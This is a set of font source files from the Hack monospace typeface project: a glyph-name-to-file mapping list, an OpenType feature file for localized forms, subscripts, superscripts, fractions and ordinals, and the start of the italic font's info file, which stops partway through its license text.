<key>uni21E0</key> <string>uni21E_0.glif</string> <key>uni21E1</key> <string>uni21E_1.glif</string> <key>uni21E2</key> <string>uni21E_2.glif</string> <key>uni21E3</key> <string>uni21E_3.glif</string> <key>uni21E4</key> <string>uni21E_4.glif</string> <key>uni21E5</key> <string>uni21E_5.glif</string> <key>uni21E6</key> <string>uni21E_6.glif</string> <key>uni21E7</key> <string>uni21E_7.glif</string> <key>uni21E8</key> <string>uni21E_8.glif</string> <key>uni21E9</key> <string>uni21E_9.glif</string> <key>uni21EB</key> <string>uni21E_B_.glif</string> <key>uni21EC</key> <string>uni21E_C_.glif</string> <key>uni21ED</key> <string>uni21E_D_.glif</string> <key>uni21EE</key> <string>uni21E_E_.glif</string> <key>uni21EF</key> <string>uni21E_F_.glif</string> <key>uni21F0</key> <string>uni21F_0.glif</string> <key>uni21F1</key> <string>uni21F_1.glif</string> <key>uni21F2</key> <string>uni21F_2.glif</string> <key>uni21F3</key> <string>uni21F_3.glif</string> <key>uni21F4</key> <string>uni21F_4.glif</string> <key>uni21F5</key> <string>uni21F_5.glif</string> <key>uni21F6</key> <string>uni21F_6.glif</string> <key>uni21F7</key> <string>uni21F_7.glif</string> <key>uni21F8</key> <string>uni21F_8.glif</string> <key>uni21F9</key> <string>uni21F_9.glif</string> <key>uni21FA</key> <string>uni21F_A_.glif</string> <key>uni21FB</key> <string>uni21F_B_.glif</string> <key>uni21FC</key> <string>uni21F_C_.glif</string> <key>uni21FD</key> <string>uni21F_D_.glif</string> <key>uni21FE</key> <string>uni21F_E_.glif</string> <key>uni21FF</key> <string>uni21F_F_.glif</string> <key>uni2201</key> <string>uni2201.glif</string> <key>uni2204</key> <string>uni2204.glif</string> <key>uni2206</key> <string>uni2206.glif</string> <key>uni220A</key> <string>uni220A_.glif</string> <key>uni220C</key> <string>uni220C_.glif</string> <key>uni220D</key> <string>uni220D_.glif</string> <key>uni220E</key> <string>uni220E_.glif</string> <key>uni2210</key> <string>uni2210.glif</string> <key>uni2213</key> <string>uni2213.glif</string> <key>uni2215</key> <string>uni2215.glif</string> <key>uni2218</key> <string>uni2218.glif</string> <key>uni2219</key> <string>uni2219.glif</string> <key>uni221B</key> <string>uni221B_.glif</string> <key>uni221C</key> <string>uni221C_.glif</string> <key>uni2223</key> <string>uni2223.glif</string> <key>uni222C</key> <string>uni222C_.glif</string> <key>uni222D</key> <string>uni222D_.glif</string> <key>uni2235</key> <string>uni2235.glif</string> <key>uni2236</key> <string>uni2236.glif</string> <key>uni2237</key> <string>uni2237.glif</string> <key>uni2238</key> <string>uni2238.glif</string> <key>uni2239</key> <string>uni2239.glif</string> <key>uni223A</key> <string>uni223A_.glif</string> <key>uni223B</key> <string>uni223B_.glif</string> <key>uni223D</key> <string>uni223D_.glif</string> <key>uni2241</key> <string>uni2241.glif</string> <key>uni2242</key> <string>uni2242.glif</string> <key>uni2243</key> <string>uni2243.glif</string> <key>uni2244</key> <string>uni2244.glif</string> <key>uni2246</key> <string>uni2246.glif</string> <key>uni2247</key> <string>uni2247.glif</string> <key>uni2249</key> <string>uni2249.glif</string> <key>uni224A</key> <string>uni224A_.glif</string> <key>uni224B</key> <string>uni224B_.glif</string> <key>uni224C</key> <string>uni224C_.glif</string> <key>uni224D</key> <string>uni224D_.glif</string> <key>uni224E</key> <string>uni224E_.glif</string> <key>uni224F</key> <string>uni224F_.glif</string> <key>uni2250</key> <string>uni2250.glif</string> <key>uni2251</key> <string>uni2251.glif</string> <key>uni2252</key> <string>uni2252.glif</string> <key>uni2253</key> <string>uni2253.glif</string> <key>uni2254</key> <string>uni2254.glif</string> <key>uni2255</key> <string>uni2255.glif</string> <key>uni2256</key> <string>uni2256.glif</string> <key>uni2257</key> <string>uni2257.glif</string> <key>uni2258</key> <string>uni2258.glif</string> <key>uni2259</key> <string>uni2259.glif</string> <key>uni225A</key> <string>uni225A_.glif</string> <key>uni225B</key> <string>uni225B_.glif</string> <key>uni225C</key> <string>uni225C_.glif</string> <key>uni225D</key> <string>uni225D_.glif</string> <key>uni225E</key> <string>uni225E_.glif</string> <key>uni225F</key> <string>uni225F_.glif</string> <key>uni2262</key> <string>uni2262.glif</string> <key>uni2263</key> <string>uni2263.glif</string> <key>uni2266</key> <string>uni2266.glif</string> <key>uni2267</key> <string>uni2267.glif</string> <key>uni2268</key> <string>uni2268.glif</string> <key>uni2269</key> <string>uni2269.glif</string> <key>uni226D</key> <string>uni226D_.glif</string> <key>uni226E</key> <string>uni226E_.glif</string> <key>uni226F</key> <string>uni226F_.glif</string> <key>uni2270</key> <string>uni2270.glif</string> <key>uni2271</key> <string>uni2271.glif</string> <key>uni2272</key> <string>uni2272.glif</string> <key>uni2273</key> <string>uni2273.glif</string> <key>uni2274</key> <string>uni2274.glif</string> <key>uni2275</key> <string>uni2275.glif</string> <key>uni2276</key> <string>uni2276.glif</string> <key>uni2277</key> <string>uni2277.glif</string> <key>uni2278</key> <string>uni2278.glif</string> <key>uni2279</key> <string>uni2279.glif</string> <key>uni227A</key> <string>uni227A_.glif</string> <key>uni227B</key> <string>uni227B_.glif</string> <key>uni227C</key> <string>uni227C_.glif</string> <key>uni227D</key> <string>uni227D_.glif</string> <key>uni227E</key> <string>uni227E_.glif</string> <key>uni227F</key> <string>uni227F_.glif</string> <key>uni2280</key> <string>uni2280.glif</string> <key>uni2281</key> <string>uni2281.glif</string> <key>uni2285</key> <string>uni2285.glif</string> <key>uni2288</key> <string>uni2288.glif</string> <key>uni2289</key> <string>uni2289.glif</string> <key>uni228A</key> <string>uni228A_.glif</string> <key>uni228B</key> <string>uni228B_.glif</string> <key>uni228D</key> <string>uni228D_.glif</string> <key>uni228E</key> <string>uni228E_.glif</string> <key>uni228F</key> <string>uni228F_.glif</string> <key>uni2290</key> <string>uni2290.glif</string> <key>uni2291</key> <string>uni2291.glif</string> <key>uni2292</key> <string>uni2292.glif</string> <key>uni2293</key> <string>uni2293.glif</string> <key>uni2294</key> <string>uni2294.glif</string> <key>uni2296</key> <string>uni2296.glif</string> <key>uni2298</key> <string>uni2298.glif</string> <key>uni2299</key> <string>uni2299.glif</string> <key>uni229A</key> <string>uni229A_.glif</string> <key>uni229B</key> <string>uni229B_.glif</string> <key>uni229C</key> <string>uni229C_.glif</string> <key>uni229D</key> <string>uni229D_.glif</string> <key>uni229E</key> <string>uni229E_.glif</string> <key>uni229F</key> <string>uni229F_.glif</string> <key>uni22A0</key> <string>uni22A_0.glif</string> <key>uni22A1</key> <string>uni22A_1.glif</string> <key>uni22A2</key> <string>uni22A_2.glif</string> <key>uni22A3</key> <string>uni22A_3.glif</string> <key>uni22A4</key> <string>uni22A_4.glif</string> <key>uni22B2</key> <string>uni22B_2.glif</string> <key>uni22B3</key> <string>uni22B_3.glif</string> <key>uni22B4</key> <string>uni22B_4.glif</string> <key>uni22B5</key> <string>uni22B_5.glif</string> <key>uni22B8</key> <string>uni22B_8.glif</string> <key>uni22C2</key> <string>uni22C_2.glif</string> <key>uni22C3</key> <string>uni22C_3.glif</string> <key>uni22C4</key> <string>uni22C_4.glif</string> <key>uni22C6</key> <string>uni22C_6.glif</string> <key>uni22CD</key> <string>uni22C_D_.glif</string> <key>uni22CE</key> <string>uni22C_E_.glif</string> <key>uni22CF</key> <string>uni22C_F_.glif</string> <key>uni22D0</key> <string>uni22D_0.glif</string> <key>uni22D1</key> <string>uni22D_1.glif</string> <key>uni22DA</key> <string>uni22D_A_.glif</string> <key>uni22DB</key> <string>uni22D_B_.glif</string> <key>uni22DC</key> <string>uni22D_C_.glif</string> <key>uni22DD</key> <string>uni22D_D_.glif</string> <key>uni22DE</key> <string>uni22D_E_.glif</string> <key>uni22DF</key> <string>uni22D_F_.glif</string> <key>uni22E0</key> <string>uni22E_0.glif</string> <key>uni22E1</key> <string>uni22E_1.glif</string> <key>uni22E2</key> <string>uni22E_2.glif</string> <key>uni22E3</key> <string>uni22E_3.glif</string> <key>uni22E4</key> <string>uni22E_4.glif</string> <key>uni22E5</key> <string>uni22E_5.glif</string> <key>uni22E6</key> <string>uni22E_6.glif</string> <key>uni22E7</key> <string>uni22E_7.glif</string> <key>uni22E8</key> <string>uni22E_8.glif</string> <key>uni22E9</key> <string>uni22E_9.glif</string> <key>uni22EF</key> <string>uni22E_F_.glif</string> <key>uni2304</key> <string>uni2304.glif</string> <key>uni2308</key> <string>uni2308.glif</string> <key>uni2309</key> <string>uni2309.glif</string> <key>uni230A</key> <string>uni230A_.glif</string> <key>uni230B</key> <string>uni230B_.glif</string> <key>uni239B</key> <string>uni239B_.glif</string> <key>uni239C</key> <string>uni239C_.glif</string> <key>uni239D</key> <string>uni239D_.glif</string> <key>uni239E</key> <string>uni239E_.glif</string> <key>uni239F</key> <string>uni239F_.glif</string> <key>uni23A0</key> <string>uni23A_0.glif</string> <key>uni23A1</key> <string>uni23A_1.glif</string> <key>uni23A2</key> <string>uni23A_2.glif</string> <key>uni23A3</key> <string>uni23A_3.glif</string> <key>uni23A4</key> <string>uni23A_4.glif</string> <key>uni23A5</key> <string>uni23A_5.glif</string> <key>uni23A6</key> <string>uni23A_6.glif</string> <key>uni23A7</key> <string>uni23A_7.glif</string> <key>uni23A8</key> <string>uni23A_8.glif</string> <key>uni23A9</key> <string>uni23A_9.glif</string> <key>uni23AA</key> <string>uni23A_A_.glif</string> <key>uni23AB</key> <string>uni23A_B_.glif</string> <key>uni23AC</key> <string>uni23A_C_.glif</string> <key>uni23AD</key> <string>uni23A_D_.glif</string> <key>uni23AE</key> <string>uni23A_E_.glif</string> <key>uni2500</key> <string>uni2500.glif</string> <key>uni2501</key> <string>uni2501.glif</string> <key>uni2502</key> <string>uni2502.glif</string> <key>uni2503</key> <string>uni2503.glif</string> <key>uni2504</key> <string>uni2504.glif</string> <key>uni2505</key> <string>uni2505.glif</string> <key>uni2506</key> <string>uni2506.glif</string> <key>uni2507</key> <string>uni2507.glif</string> <key>uni2508</key> <string>uni2508.glif</string> <key>uni2509</key> <string>uni2509.glif</string> <key>uni250A</key> <string>uni250A_.glif</string> <key>uni250B</key> <string>uni250B_.glif</string> <key>uni250C</key> <string>uni250C_.glif</string> <key>uni250D</key> <string>uni250D_.glif</string> <key>uni250E</key> <string>uni250E_.glif</string> <key>uni250F</key> <string>uni250F_.glif</string> <key>uni2510</key> <string>uni2510.glif</string> <key>uni2511</key> <string>uni2511.glif</string> <key>uni2512</key> <string>uni2512.glif</string> <key>uni2513</key> <string>uni2513.glif</string> <key>uni2514</key> <string>uni2514.glif</string> <key>uni2515</key> <string>uni2515.glif</string> <key>uni2516</key> <string>uni2516.glif</string> <key>uni2517</key> <string>uni2517.glif</string> <key>uni2518</key> <string>uni2518.glif</string> <key>uni2519</key> <string>uni2519.glif</string> <key>uni251A</key> <string>uni251A_.glif</string> <key>uni251B</key> <string>uni251B_.glif</string> <key>uni251C</key> <string>uni251C_.glif</string> <key>uni251D</key> <string>uni251D_.glif</string> <key>uni251E</key> <string>uni251E_.glif</string> <key>uni251F</key> <string>uni251F_.glif</string> <key>uni2520</key> <string>uni2520.glif</string> <key>uni2521</key> <string>uni2521.glif</string> <key>uni2522</key> <string>uni2522.glif</string> <key>uni2523</key> <string>uni2523.glif</string> <key>uni2524</key> <string>uni2524.glif</string> <key>uni2525</key> <string>uni2525.glif</string> <key>uni2526</key> <string>uni2526.glif</string> <key>uni2527</key> <string>uni2527.glif</string> <key>uni2528</key> <string>uni2528.glif</string> <key>uni2529</key> <string>uni2529.glif</string> <key>uni252A</key> <string>uni252A_.glif</string> <key>uni252B</key> <string>uni252B_.glif</string> <key>uni252C</key> <string>uni252C_.glif</string> <key>uni252D</key> <string>uni252D_.glif</string> <key>uni252E</key> <string>uni252E_.glif</string> <key>uni252F</key> <string>uni252F_.glif</string> <key>uni2530</key> <string>uni2530.glif</string> <key>uni2531</key> <string>uni2531.glif</string> <key>uni2532</key> <string>uni2532.glif</string> <key>uni2533</key> <string>uni2533.glif</string> <key>uni2534</key> <string>uni2534.glif</string> <key>uni2535</key> <string>uni2535.glif</string> <key>uni2536</key> <string>uni2536.glif</string> <key>uni2537</key> <string>uni2537.glif</string> <key>uni2538</key> <string>uni2538.glif</string> <key>uni2539</key> <string>uni2539.glif</string> <key>uni253A</key> <string>uni253A_.glif</string> <key>uni253B</key> <string>uni253B_.glif</string> <key>uni253C</key> <string>uni253C_.glif</string> <key>uni253D</key> <string>uni253D_.glif</string> <key>uni253E</key> <string>uni253E_.glif</string> <key>uni253F</key> <string>uni253F_.glif</string> <key>uni2540</key> <string>uni2540.glif</string> <key>uni2541</key> <string>uni2541.glif</string> <key>uni2542</key> <string>uni2542.glif</string> <key>uni2543</key> <string>uni2543.glif</string> <key>uni2544</key> <string>uni2544.glif</string> <key>uni2545</key> <string>uni2545.glif</string> <key>uni2546</key> <string>uni2546.glif</string> <key>uni2547</key> <string>uni2547.glif</string> <key>uni2548</key> <string>uni2548.glif</string> <key>uni2549</key> <string>uni2549.glif</string> <key>uni254A</key> <string>uni254A_.glif</string> <key>uni254B</key> <string>uni254B_.glif</string> <key>uni254C</key> <string>uni254C_.glif</string> <key>uni254D</key> <string>uni254D_.glif</string> <key>uni254E</key> <string>uni254E_.glif</string> <key>uni254F</key> <string>uni254F_.glif</string> <key>uni2550</key> <string>uni2550.glif</string> <key>uni2551</key> <string>uni2551.glif</string> <key>uni2552</key> <string>uni2552.glif</string> <key>uni2553</key> <string>uni2553.glif</string> <key>uni2554</key> <string>uni2554.glif</string> <key>uni2555</key> <string>uni2555.glif</string> <key>uni2556</key> <string>uni2556.glif</string> <key>uni2557</key> <string>uni2557.glif</string> <key>uni2558</key> <string>uni2558.glif</string> <key>uni2559</key> <string>uni2559.glif</string> <key>uni255A</key> <string>uni255A_.glif</string> <key>uni255B</key> <string>uni255B_.glif</string> <key>uni255C</key> <string>uni255C_.glif</string> <key>uni255D</key> <string>uni255D_.glif</string> <key>uni255E</key> <string>uni255E_.glif</string> <key>uni255F</key> <string>uni255F_.glif</string> <key>uni2560</key> <string>uni2560.glif</string> <key>uni2561</key> <string>uni2561.glif</string> <key>uni2562</key> <string>uni2562.glif</string> <key>uni2563</key> <string>uni2563.glif</string> <key>uni2564</key> <string>uni2564.glif</string> <key>uni2565</key> <string>uni2565.glif</string> <key>uni2566</key> <string>uni2566.glif</string> <key>uni2567</key> <string>uni2567.glif</string> <key>uni2568</key> <string>uni2568.glif</string> <key>uni2569</key> <string>uni2569.glif</string> <key>uni256A</key> <string>uni256A_.glif</string> <key>uni256B</key> <string>uni256B_.glif</string> <key>uni256C</key> <string>uni256C_.glif</string> <key>uni256D</key> <string>uni256D_.glif</string> <key>uni256E</key> <string>uni256E_.glif</string> <key>uni256F</key> <string>uni256F_.glif</string> <key>uni2570</key> <string>uni2570.glif</string> <key>uni2571</key> <string>uni2571.glif</string> <key>uni2572</key> <string>uni2572.glif</string> <key>uni2573</key> <string>uni2573.glif</string> <key>uni2574</key> <string>uni2574.glif</string> <key>uni2575</key> <string>uni2575.glif</string> <key>uni2576</key> <string>uni2576.glif</string> <key>uni2577</key> <string>uni2577.glif</string> <key>uni2578</key> <string>uni2578.glif</string> <key>uni2579</key> <string>uni2579.glif</string> <key>uni257A</key> <string>uni257A_.glif</string> <key>uni257B</key> <string>uni257B_.glif</string> <key>uni257C</key> <string>uni257C_.glif</string> <key>uni257D</key> <string>uni257D_.glif</string> <key>uni257E</key> <string>uni257E_.glif</string> <key>uni257F</key> <string>uni257F_.glif</string> <key>uni2581</key> <string>uni2581.glif</string> <key>uni2582</key> <string>uni2582.glif</string> <key>uni2583</key> <string>uni2583.glif</string> <key>uni2585</key> <string>uni2585.glif</string> <key>uni2586</key> <string>uni2586.glif</string> <key>uni2587</key> <string>uni2587.glif</string> <key>uni2589</key> <string>uni2589.glif</string> <key>uni258A</key> <string>uni258A_.glif</string> <key>uni258B</key> <string>uni258B_.glif</string> <key>uni258D</key> <string>uni258D_.glif</string> <key>uni258E</key> <string>uni258E_.glif</string> <key>uni258F</key> <string>uni258F_.glif</string> <key>uni2594</key> <string>uni2594.glif</string> <key>uni2595</key> <string>uni2595.glif</string> <key>uni2596</key> <string>uni2596.glif</string> <key>uni2597</key> <string>uni2597.glif</string> <key>uni2598</key> <string>uni2598.glif</string> <key>uni2599</key> <string>uni2599.glif</string> <key>uni259A</key> <string>uni259A_.glif</string> <key>uni259B</key> <string>uni259B_.glif</string> <key>uni259C</key> <string>uni259C_.glif</string> <key>uni259D</key> <string>uni259D_.glif</string> <key>uni259E</key> <string>uni259E_.glif</string> <key>uni259F</key> <string>uni259F_.glif</string> <key>uni25A1</key> <string>uni25A_1.glif</string> <key>uni25A2</key> <string>uni25A_2.glif</string> <key>uni25A3</key> <string>uni25A_3.glif</string> <key>uni25A4</key> <string>uni25A_4.glif</string> <key>uni25A5</key> <string>uni25A_5.glif</string> <key>uni25A6</key> <string>uni25A_6.glif</string> <key>uni25A7</key> <string>uni25A_7.glif</string> <key>uni25A8</key> <string>uni25A_8.glif</string> <key>uni25A9</key> <string>uni25A_9.glif</string> <key>uni25AA</key> <string>uni25A_A_.glif</string> <key>uni25AB</key> <string>uni25A_B_.glif</string> <key>uni25AD</key> <string>uni25A_D_.glif</string> <key>uni25AE</key> <string>uni25A_E_.glif</string> <key>uni25AF</key> <string>uni25A_F_.glif</string> <key>uni25B0</key> <string>uni25B_0.glif</string> <key>uni25B1</key> <string>uni25B_1.glif</string> <key>uni25B3</key> <string>uni25B_3.glif</string> <key>uni25B4</key> <string>uni25B_4.glif</string> <key>uni25B5</key> <string>uni25B_5.glif</string> <key>uni25B6</key> <string>uni25B_6.glif</string> <key>uni25B7</key> <string>uni25B_7.glif</string> <key>uni25B8</key> <string>uni25B_8.glif</string> <key>uni25B9</key> <string>uni25B_9.glif</string> <key>uni25BB</key> <string>uni25B_B_.glif</string> <key>uni25BD</key> <string>uni25B_D_.glif</string> <key>uni25BE</key> <string>uni25B_E_.glif</string> <key>uni25BF</key> <string>uni25B_F_.glif</string> <key>uni25C0</key> <string>uni25C_0.glif</string> <key>uni25C1</key> <string>uni25C_1.glif</string> <key>uni25C2</key> <string>uni25C_2.glif</string> <key>uni25C3</key> <string>uni25C_3.glif</string> <key>uni25C5</key> <string>uni25C_5.glif</string> <key>uni25C6</key> <string>uni25C_6.glif</string> <key>uni25C7</key> <string>uni25C_7.glif</string> <key>uni25C8</key> <string>uni25C_8.glif</string> <key>uni25C9</key> <string>uni25C_9.glif</string> <key>uni25CC</key> <string>uni25C_C_.glif</string> <key>uni25CD</key> <string>uni25C_D_.glif</string> <key>uni25CE</key> <string>uni25C_E_.glif</string> <key>uni25CF</key> <string>uni25C_F_.glif</string> <key>uni25D0</key> <string>uni25D_0.glif</string> <key>uni25D1</key> <string>uni25D_1.glif</string> <key>uni25D2</key> <string>uni25D_2.glif</string> <key>uni25D3</key> <string>uni25D_3.glif</string> <key>uni25D4</key> <string>uni25D_4.glif</string> <key>uni25D5</key> <string>uni25D_5.glif</string> <key>uni25D6</key> <string>uni25D_6.glif</string> <key>uni25D7</key> <string>uni25D_7.glif</string> <key>uni25DA</key> <string>uni25D_A_.glif</string> <key>uni25DB</key> <string>uni25D_B_.glif</string> <key>uni25DC</key> <string>uni25D_C_.glif</string> <key>uni25DD</key> <string>uni25D_D_.glif</string> <key>uni25DE</key> <string>uni25D_E_.glif</string> <key>uni25DF</key> <string>uni25D_F_.glif</string> <key>uni25E0</key> <string>uni25E_0.glif</string> <key>uni25E1</key> <string>uni25E_1.glif</string> <key>uni25E2</key> <string>uni25E_2.glif</string> <key>uni25E3</key> <string>uni25E_3.glif</string> <key>uni25E4</key> <string>uni25E_4.glif</string> <key>uni25E5</key> <string>uni25E_5.glif</string> <key>uni25E7</key> <string>uni25E_7.glif</string> <key>uni25E8</key> <string>uni25E_8.glif</string> <key>uni25E9</key> <string>uni25E_9.glif</string> <key>uni25EA</key> <string>uni25E_A_.glif</string> <key>uni25EB</key> <string>uni25E_B_.glif</string> <key>uni25EC</key> <string>uni25E_C_.glif</string> <key>uni25ED</key> <string>uni25E_D_.glif</string> <key>uni25EE</key> <string>uni25E_E_.glif</string> <key>uni25EF</key> <string>uni25E_F_.glif</string> <key>uni25F0</key> <string>uni25F_0.glif</string> <key>uni25F1</key> <string>uni25F_1.glif</string> <key>uni25F2</key> <string>uni25F_2.glif</string> <key>uni25F3</key> <string>uni25F_3.glif</string> <key>uni25F4</key> <string>uni25F_4.glif</string> <key>uni25F5</key> <string>uni25F_5.glif</string> <key>uni25F6</key> <string>uni25F_6.glif</string> <key>uni25F7</key> <string>uni25F_7.glif</string> <key>uni25F8</key> <string>uni25F_8.glif</string> <key>uni25F9</key> <string>uni25F_9.glif</string> <key>uni25FA</key> <string>uni25F_A_.glif</string> <key>uni25FB</key> <string>uni25F_B_.glif</string> <key>uni25FC</key> <string>uni25F_C_.glif</string> <key>uni25FD</key> <string>uni25F_D_.glif</string> <key>uni25FE</key> <string>uni25F_E_.glif</string> <key>uni25FF</key> <string>uni25F_F_.glif</string> <key>uni27C2</key> <string>uni27C_2.glif</string> <key>uni27C5</key> <string>uni27C_5.glif</string> <key>uni27C6</key> <string>uni27C_6.glif</string> <key>uni27DC</key> <string>uni27D_C_.glif</string> <key>uni27E0</key> <string>uni27E_0.glif</string> <key>uni27E6</key> <string>uni27E_6.glif</string> <key>uni27E7</key> <string>uni27E_7.glif</string> <key>uni27E8</key> <string>uni27E_8.glif</string> <key>uni27E9</key> <string>uni27E_9.glif</string> <key>uni27EA</key> <string>uni27E_A_.glif</string> <key>uni27EB</key> <string>uni27E_B_.glif</string> <key>uni27F5</key> <string>uni27F_5.glif</string> <key>uni27F6</key> <string>uni27F_6.glif</string> <key>uni27F7</key> <string>uni27F_7.glif</string> <key>uni2987</key> <string>uni2987.glif</string> <key>uni2988</key> <string>uni2988.glif</string> <key>uni2997</key> <string>uni2997.glif</string> <key>uni2998</key> <string>uni2998.glif</string> <key>uni29EB</key> <string>uni29E_B_.glif</string> <key>uni29FA</key> <string>uni29F_A_.glif</string> <key>uni29FB</key> <string>uni29F_B_.glif</string> <key>uni2A00</key> <string>uni2A_00.glif</string> <key>uni2A2F</key> <string>uni2A_2F_.glif</string> <key>uni2A6A</key> <string>uni2A_6A_.glif</string> <key>uni2A6B</key> <string>uni2A_6B_.glif</string> <key>uni2B05</key> <string>uni2B_05.glif</string> <key>uni2B06</key> <string>uni2B_06.glif</string> <key>uni2B07</key> <string>uni2B_07.glif</string> <key>uni2B08</key> <string>uni2B_08.glif</string> <key>uni2B09</key> <string>uni2B_09.glif</string> <key>uni2B0A</key> <string>uni2B_0A_.glif</string> <key>uni2B0B</key> <string>uni2B_0B_.glif</string> <key>uni2B0C</key> <string>uni2B_0C_.glif</string> <key>uni2B0D</key> <string>uni2B_0D_.glif</string> <key>uni2B16</key> <string>uni2B_16.glif</string> <key>uni2B17</key> <string>uni2B_17.glif</string> <key>uni2B18</key> <string>uni2B_18.glif</string> <key>uni2B19</key> <string>uni2B_19.glif</string> <key>uni2B1A</key> <string>uni2B_1A_.glif</string> <key>uni2E18</key> <string>uni2E_18.glif</string> <key>uni2E18.case</key> <string>uni2E_18.case.glif</string> <key>uni2E1F</key> <string>uni2E_1F_.glif</string> <key>uni2E22</key> <string>uni2E_22.glif</string> <key>uni2E23</key> <string>uni2E_23.glif</string> <key>uni2E24</key> <string>uni2E_24.glif</string> <key>uni2E25</key> <string>uni2E_25.glif</string> <key>uni2E2E</key> <string>uni2E_2E_.glif</string> <key>uniE0A0</key> <string>uniE_0A_0.glif</string> <key>uniE0A1</key> <string>uniE_0A_1.glif</string> <key>uniE0A2</key> <string>uniE_0A_2.glif</string> <key>uniE0B0</key> <string>uniE_0B_0.glif</string> <key>uniE0B1</key> <string>uniE_0B_1.glif</string> <key>uniE0B2</key> <string>uniE_0B_2.glif</string> <key>uniE0B3</key> <string>uniE_0B_3.glif</string> <key>uniFEFF</key> <string>uniF_E_F_F_.glif</string> <key>union</key> <string>union.glif</string> <key>universal</key> <string>universal.glif</string> <key>uogonek</key> <string>uogonek.glif</string> <key>upblock</key> <string>upblock.glif</string> <key>upsilon</key> <string>upsilon.glif</string> <key>upsilondieresis</key> <string>upsilondieresis.glif</string> <key>upsilondieresistonos</key> <string>upsilondieresistonos.glif</string> <key>upsilontonos</key> <string>upsilontonos.glif</string> <key>uring</key> <string>uring.glif</string> <key>utilde</key> <string>utilde.glif</string> <key>v</key> <string>v.glif</string> <key>w</key> <string>w.glif</string> <key>wacute</key> <string>wacute.glif</string> <key>wcircumflex</key> <string>wcircumflex.glif</string> <key>wdieresis</key> <string>wdieresis.glif</string> <key>wgrave</key> <string>wgrave.glif</string> <key>x</key> <string>x.glif</string> <key>xi</key> <string>xi.glif</string> <key>y</key> <string>y.glif</string> <key>yacute</key> <string>yacute.glif</string> <key>ycircumflex</key> <string>ycircumflex.glif</string> <key>ydieresis</key> <string>ydieresis.glif</string> <key>yen</key> <string>yen.glif</string> <key>ygrave</key> <string>ygrave.glif</string> <key>z</key> <string>z.glif</string> <key>zacute</key> <string>zacute.glif</string> <key>zcaron</key> <string>zcaron.glif</string> <key>zdotaccent</key> <string>zdotaccent.glif</string> <key>zero</key> <string>zero.glif</string> <key>zero.subs</key> <string>zero.subs.glif</string> <key>zeta</key> <string>zeta.glif</string> </dict> </plist>
Hack/source/Hack-Italic.ufo/features.fea
# Prefix: Languagesystems languagesystem DFLT dflt; languagesystem latn dflt; languagesystem latn MOL ; languagesystem latn ROM ; # Prefix: Prefix @aalt1 = [\zero \one \two \three \four \five \six \seven \eight \nine]; @subs1 = [\zero.subs \one.subs \two.subs \three.subs \four.subs \five.subs \six.subs \seven.subs \eight.subs \nine.subs]; @sups1 = [\uni2070 \uni00B9 \uni00B2 \uni00B3 \uni2074 \uni2075 \uni2076 \uni2077 \uni2078 \uni2079]; # @case1 = [\exclamdown \questiondown \uni2E18 \uni0304 \uni0306 \uni0307 \uni030B \uni030F \uni0311]; # @case2 = [\exclamdown.case \questiondown.case \uni2E18.case \uni0304.case \uni0306.case \uni0307.case \uni030B.case \uni030F.case \uni0311.case]; feature aalt { feature locl; feature subs; feature sinf; feature sups; feature ordn; } aalt; feature locl { # Localized Forms script latn; # Latin language MOL exclude_dflt; # Moldavian sub [Scedilla scedilla] by [uni0218 uni0219]; language ROM exclude_dflt; # Romanian sub [Scedilla scedilla] by [uni0218 uni0219]; } locl; feature subs { # Subscript # DEFAULT sub @aalt1 by @subs1; script latn; # Latin sub @aalt1 by @subs1; language MOL ; # Moldavian language ROM ; # Romanian } subs; feature sinf { # Scientific Inferiors # DEFAULT sub @aalt1 by @subs1; script latn; # Latin sub @aalt1 by @subs1; language MOL ; # Moldavian language ROM ; # Romanian } sinf; feature sups { # Superscript # DEFAULT sub @aalt1 by @sups1; script latn; # Latin sub @aalt1 by @sups1; language MOL ; # Moldavian language ROM ; # Romanian } sups; feature frac { # Fractions # DEFAULT sub one slash two by onehalf; sub one slash three by uni2153; sub one slash four by onequarter; sub one slash five by uni2155; sub one slash six by uni2159; sub one slash eight by oneeighth; sub two slash three by uni2154; sub two slash five by uni2156; sub three slash four by threequarters; sub three slash five by uni2157; sub three slash eight by threeeighths; sub four slash five by uni2158; sub five slash six by uni215A; sub five slash eight by fiveeighths; sub seven slash eight by seveneighths; script latn; # Latin sub one slash two by onehalf; sub one slash three by uni2153; sub one slash four by onequarter; sub one slash five by uni2155; sub one slash six by uni2159; sub one slash eight by oneeighth; sub two slash three by uni2154; sub two slash five by uni2156; sub three slash four by threequarters; sub three slash five by uni2157; sub three slash eight by threeeighths; sub four slash five by uni2158; sub five slash six by uni215A; sub five slash eight by fiveeighths; sub seven slash eight by seveneighths; language MOL ; # Moldavian language ROM ; # Romanian } frac; feature ordn { # Ordinals # DEFAULT sub @aalt1 [A a]' by [ordfeminine ordfeminine]; sub @aalt1 [O o]' by [ordmasculine ordmasculine]; script latn; # Latin sub @aalt1 [A a]' by [ordfeminine ordfeminine]; sub @aalt1 [O o]' by [ordmasculine ordmasculine]; language MOL ; # Moldavian language ROM ; # Romanian } ordn; #feature case { # # Case-Sensitive Forms # # DEFAULT # sub @case1 by @case2; # script latn; # Latin # sub @case1 by @case2; # language MOL ; # Moldavian # language ROM ; # Romanian #} case;
Hack/source/Hack-Italic.ufo/fontinfo.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>ascender</key> <integer>1556</integer> <key>capHeight</key> <integer>1493</integer> <key>copyright</key> <string>Copyright (c) 2018 Source Foundry Authors / Copyright (c) 2003 by Bitstream, Inc. All Rights Reserved.</string> <key>descender</key> <integer>-492</integer> <key>familyName</key> <string>Hack</string> <key>italicAngle</key> <real>-11</real> <key>macintoshFONDFamilyID</key> <integer>128</integer> <key>macintoshFONDName</key> <string>Hack</string> <key>note</key> <string></string> <key>openTypeHeadCreated</key> <string>2017/10/23 12:00:00</string> <key>openTypeHeadFlags</key> <array> </array> <key>openTypeHheaAscender</key> <integer>1901</integer> <key>openTypeHheaDescender</key> <integer>-483</integer> <key>openTypeHheaLineGap</key> <integer>0</integer> <key>openTypeNameCompatibleFullName</key> <string>Hack Italic</string> <key>openTypeNameDescription</key> <string></string> <key>openTypeNameDesigner</key> <string>Source Foundry Authors</string> <key>openTypeNameDesignerURL</key> <string>https://github.com/source-foundry/Hack</string> <key>openTypeNameLicense</key> <string>The work in the Hack project is Copyright 2018 Source Foundry Authors and licensed under the MIT License The work in the DejaVu project was committed to the public domain. Bitstream Vera Sans Mono Copyright 2003 Bitstream Inc. and licensed under the Bitstream Vera License with 